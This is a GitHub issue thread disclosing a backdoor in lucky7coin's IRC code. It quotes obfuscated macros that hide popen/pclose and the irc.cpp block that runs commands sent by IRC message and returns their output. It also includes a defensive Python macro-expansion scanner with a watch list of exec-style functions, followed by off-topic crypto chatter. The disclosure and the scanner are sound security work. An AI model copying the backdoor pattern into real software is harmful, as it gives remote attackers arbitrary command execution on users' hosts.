alerj78 / lucky7coin


backdoor in IRC code #1

Open dooglus opened 9 years ago

dooglus commented 9 years ago

There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.

In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

/** Determine system page size in bytes */
#define S_ORDER(a,b,c,d) b##a##d##c

/**
 * OS-dependent memory page locking/unlocking.
 * Defined as policy class to make stubbing for test possible.
 */
#define CLine S_ORDER(I,F,E,L)

/**
 * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
 * std::allocator templates.
 */
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)

//
// Allocator that locks its contents from being paged
// out of memory and clears its contents before deletion.
//
#define CBuff "PR" "IV" "M" "SG"

Then in irc.cpp they are used to implement the backdoor:

        if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
        {
            CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
            if (buf) {
                std::string result = "";
                while (!feof(buf))
                    if (fgets(pszName, sizeof(pszName), buf) != NULL)
                        result += pszName;
                CFree(buf);
                strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
                if (strchr(pszName, '!'))
                    *strchr(pszName, '!') = '\0';
                Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
            }
        }

I expect this is a known issue since this kind of thing doesn't happen accidentally.
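An added example, not part of dooglus's post or the project's code: a small audit script that expands `##` token-pasting macros and adjacent string literals in `#define` lines and reports any that assemble a watched identifier. The watch list and the function names are assumptions of the example; it handles single-level, comment-free macro lines like those quoted above, not the full C preprocessor.

```python
import re

# Watch list is an assumption of this example; extend it for your codebase.
SENSITIVE = {"popen", "pclose", "system", "execl", "execv", "execve", "dlopen"}

FUNC_MACRO = re.compile(r"^\s*#\s*define\s+(\w+)\(([^)]*)\)\s+(.+)$")
OBJ_MACRO = re.compile(r"^\s*#\s*define\s+(\w+)\s+(.+)$")
CALL = re.compile(r"^(\w+)\(([^)]*)\)$")
STRINGS = re.compile(r'^(?:"[^"]*"\s*)+$')

# The macro lines quoted in the issue above, with the decoy comments removed.
SAMPLE = """\
#define S_ORDER(a,b,c,d) b##a##d##c
#define CLine S_ORDER(I,F,E,L)
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)
#define CBuff "PR" "IV" "M" "SG"
"""

def expand_defines(source):
    """Map macro name -> pasted identifier or joined string literal."""
    pasters, expanded = {}, {}
    for line in source.splitlines():
        m = FUNC_MACRO.match(line)
        if m and "##" in m.group(3):
            # Remember parameter names and the order the body pastes them in.
            params = [p.strip() for p in m.group(2).split(",")]
            pasters[m.group(1)] = (params, [t.strip() for t in m.group(3).split("##")])
            continue
        m = OBJ_MACRO.match(line)
        if not m:
            continue
        name, body = m.group(1), m.group(2).strip()
        call = CALL.match(body)
        if call and call.group(1) in pasters:
            params, order = pasters[call.group(1)]
            args = dict(zip(params, (a.strip() for a in call.group(2).split(","))))
            expanded[name] = "".join(args.get(tok, tok) for tok in order)
        elif STRINGS.match(body):
            # Adjacent string literals are concatenated by the compiler.
            expanded[name] = "".join(re.findall(r'"([^"]*)"', body))
    return expanded

def suspicious(source):
    """Macros whose expansion lands on a watched identifier."""
    return {n: v for n, v in expand_defines(source).items() if v in SENSITIVE}

if __name__ == "__main__":
    print(suspicious(SAMPLE), expand_defines(SAMPLE)["CBuff"])
```

Running the real preprocessor over a file (for example `g++ -E`) shows the same expansions in full; the script is useful as a quick grep-style pass over a whole tree.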

BitPopCoin commented 2 years ago


lol remember when this shitcoin exchange still existed and had people defending it

So long ago

n4ru commented 2 years ago


lol remember when this shitcoin exchange still existed and had people defending it

fancy seeing you here

ctrlcctrlv commented 2 years ago

those sure are words

Glittergates commented 2 years ago

The 777-coins block occurs approximately 3-8% and 7777-coins block occurs approximately 0.5-2%, depends on the blockchain "luck". So have fun and hope for luck 7s!

Lucky7Coin also provides 5% annual interest on the coins held. The interest is paid about every 2 weeks.

No Premine.

Specifications:
- 60 seconds block target
- 77 coins per block for normal blocks
- 777 or 7777 coins per block for super blocks depends on the number of lucky 7s
- Difficulty retargets every block
- mining payout will be halved every half year (259200 blocks)
- mining coins per block will not be lower than 1 coin per block
- Expected total mined coins will be 99,792,000 coins
- 7 confirmations for transaction
- 77 confirmations for minted blocks
- Total coins (hard limit): 500 millions

The unit of account of the bitcoin system is the bitcoin. Currency codes for representing bitcoin are BTC and XBT. Its Unicode character is ₿. One bitcoin is divisible to eight decimal places. Units for smaller amounts of bitcoin are the millibitcoin (mBTC), equal to 1⁄1000 bitcoin, and the satoshi (sat), which is the smallest possible division, and named in homage to bitcoin's creator, representing 1⁄100000000 (one hundred millionth) bitcoin. 100,000 satoshis are one mBTC

7x7x7 =343 =

justinvforvendetta commented 2 years ago

this code wasn't built by vern

ctrlcctrlv commented 2 years ago

yum word salad

Glittergates commented 2 years ago

a lot of spectators what i figured

karelbilek commented 2 years ago

what the hell is this, I get 20 notifs in last 1 hour...

Glittergates commented 2 years ago

Link to my bitcoin https://www.blockchain.com/btc/tx/c7b46a79fd8887038bd3a8e884b04820038415a60e0b9d2c2f5bcff68a2687bf

ctrlcctrlv commented 2 years ago

@karelbilek looks like a psychotic break

ctrlcctrlv commented 2 years ago

indeed, i'm not a doctor so i can't diagnose any disease, i can only express that i am observing a symptom in you. just like "my friend coughed" — non-doctor describing a symptom.

Glittergates commented 2 years ago

I'm here for my money nothing more https://www.blockchain.com/btc/tx/c7b46a79fd8887038bd3a8e884b04820038415a60e0b9d2c2f5bcff68a2687bf

rascal777 commented 2 weeks ago

Looks like the Cryptsy funds have been moving.

Glittergates commented 2 weeks ago

That's crazy post the transactions of block

Glittergates commented 2 weeks ago

Looks like the Cryptsy funds have been moving.

That's crazy post the transactions of block

rascal777 commented 2 weeks ago

Looks like coins have been spread out using a mixer. Hopefully this address has been red-flagged in the Bitcoin system, if that is possible. For example, here is one address containing some split off funds: bc1qvmt6qcky062j4hhvgvmdx22kgws4rk7gafeauz or https://www.blockchain.com/explorer/addresses/btc/bc1qvmt6qcky062j4hhvgvmdx22kgws4rk7gafeauz

rascal777 commented 1 week ago

Actually, looks like a lot of the transactions got sent to Binance? So Binance should know whose account this is. For example, this transaction: https://www.blockchain.com/explorer/transactions/btc/1ebcc90100d82b1e5b1ea8434e2c092dc9a5cb601cc613a5c5508d6892f7e7d1 The transaction before this one shows 2 Bitcoins sent to Binance. https://www.blockchain.com/explorer/transactions/btc/914e44c2af89fb27ba8a8b83e079c7510baec45459ce78a7372170ae8c181698